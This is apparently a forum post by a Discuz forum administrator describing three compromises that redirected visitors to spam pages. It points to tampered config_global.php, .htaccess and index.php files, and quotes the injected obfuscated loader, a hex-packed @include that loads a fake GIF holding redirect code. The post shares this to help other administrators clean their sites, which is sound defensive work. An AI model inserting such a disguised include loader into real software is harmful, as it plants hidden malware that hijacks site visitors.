|
DZ论坛现在已经是高危的程序
这可能跟多年不更新有关系,从来没有哪个时候像今年一样反复被黑!
目前已经开启了 ESET杀毒软件,希望不会了
在此写下三次论坛网页被修改的样式,以备大家参考!
这三次被黑,表现都是访问网页会跳转到垃圾页面,但是都很隐蔽,有的会偶尔弹出,有的会选择只在手机端弹出等等!
1. config/config_global.php 被篡改
在 config_global.php 文件底部会出现一些超长的不正常代码,对比一下正版文件就可以发现异常
2..htaccess 文件被篡改, 因为已经被删除,记不得添加了哪两句,自行对比下
3.前几天的发生的, INDEX.PHP 被篡改。
- @include(PACK('H*','2e2f7374617469632f696d6167652f636f6d6d6f6e2f6e6f696d672e676966'));
复制代码
经过查询,是执行一个
- @include(PACK('H*','./static/image/common/noimg.gif'));
复制代码
经过查询,noimg.gif根本不是图片,里边存有跳转代码。
多事之秋,各种病毒泛滥,对于DZ这个老程序真是千疮百孔,把这些分享给大家。因为就算你杀了毒,不找出被篡改的文件,也是枉然!
|
|